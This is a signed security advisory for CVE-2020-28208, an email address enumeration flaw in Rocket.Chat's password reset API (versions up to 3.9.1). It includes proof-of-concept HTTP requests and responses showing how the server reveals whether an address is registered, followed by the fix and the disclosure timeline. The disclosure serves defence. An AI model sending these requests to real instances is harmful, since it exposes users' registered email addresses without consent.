-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 # Trovent Security Advisory 2010-01 # ##################################### Email address enumeration in reset password ########################################### Overview ######## Advisory ID: TRSA-2010-01 Advisory version: 1.2 Advisory status: Public Advisory URL: https://trovent.io/security-advisory-2010-01 Affected product: Web application Rocket.Chat Affected version: <= 3.9.1 Vendor: Rocket.Chat Technologies Corp., https://rocket.chat Credits: Trovent Security GmbH, Nick Decker, Stefan Pietsch Detailed description #################### Trovent Security GmbH discovered an email address enumeration vulnerability in the password reset function of the chat application Rocket.Chat. This vulnerability lets an unauthorized user enumerate registered email addresses on the instance of Rocket.Chat. Severity: Medium CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) CVE ID: CVE-2020-28208 CWE ID: CWE-204 Proof of concept ################ Sample HTTP request sent with a registered email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1 Host: localhost:3000 Content-Length: 122 Accept: */* Content-Type: application/json {"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"positive@test.de\"],\"id\":\"3\"}"} ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The server response to a valid email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/1.1 200 OK X-XSS-Protection: 1 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin X-Instance-ID: DQDfuEfNLdbZr3zYH Cache-Control: no-store Pragma: no-cache content-type: application/json Vary: Accept-Encoding Date: Tue, 03 Nov 2020 12:01:25 GMT Connection: keep-alive Content-Length: 78 {"message":"{\"msg\":\"result\",\"id\":\"3\",\"result\":true}","success":true} ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sample HTTP request sent with a non registered email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1 Host: localhost:3000 Content-Length: 119 Accept: */* Content-Type: application/json {"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"false@test.de\"],\"id\":\"3\"}"} ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The server response to an invalid email address: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/1.1 200 OK X-XSS-Protection: 1 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin X-Instance-ID: DQDfuEfNLdbZr3zYH Cache-Control: no-store Pragma: no-cache content-type: application/json Vary: Accept-Encoding Date: Tue, 03 Nov 2020 12:03:08 GMT Connection: keep-alive Content-Length: 79 {"message":"{\"msg\":\"result\",\"id\":\"3\",\"result\":false}","success":true} ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution / Workaround ##################### Ensure the application returns consistent generic server responses independent of the email address entered during the password reset process. Fixed in Rocket.Chat version 3.9.2, verified by Trovent. History ####### 2020-10-27: Vulnerability found 2020-11-03: Advisory created and CVE ID requested 2020-11-06: Vendor contacted and informed about planned disclosure date 2020-11-06: Vendor confirmed vulnerability, working on a fix 2021-01-07: Advisory published 2021-01-08: Vendor sent us information about fixed version 2021-01-13: Updated affected version (thanks @LorenzNickel), verified with 3.9.1 -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE0wArIZvu5AKY9ZSXzx6v/h6FjrcFAl/+qOQACgkQzx6v/h6F jreXZQ/9GwyDxpyL37pIsUQegE7Gx/MqY/KIK+Rguy7joRT0HN72LF+5M3M31H7/ xzfRptDtYla5j5r4F7NbJecD5UaDV0AwcDF6uA0fH7cGkX4kYvcL6qFJnnpd8V5n Zk6j5oetKPpDOYhA/0drMOtsQ4pU0Qg9UTzt1eK1AsS4/+GZZg68aNWleFxXJD5k ol5YvjGZiGfQoERXxmHOjcBdGEtGKriqf35h3WDoFa0tOjVbneYdsWVU2phLlGCN JQN9HM6JrDj1wOZpd8ZIND+9vIbo007AyaWmOCSjvXnqZJ5UwCyhNq5w2xZwvkEv xzNf6vCu3W0+BtANDfXbcTX71R+3UGsek288a7dsxbtPcClB7yk10AWonwqqrzIS jf+awVbEQ0P+ShLZbnKQkP5wU2NqUNo3T0m9BGVCL5TjODDgrhl+cx5SV9TLQd0o S2yN9a1FmseZMsTierZgKJXXzY9kuqm55R37AIt+COkqPIADjhIlCBS/kRW0J0oW 3WN/9fbMxM296CIQ2f0JLhdY1M9FqTzjnpNId73RS7h4HRcsRXmNWUbGo1nqN/Lp 2TkHNzCmeu4MBliaCJup5x5gMno/1oiDxxtsQZnd71odfbAjtlIz2/HzEzmRzYi/ DRnUFnJaFyAHMLBzF/olowtLV5lzsCLfj9KkeB7eF3QnI9fZDrw= =NmjA -----END PGP SIGNATURE-----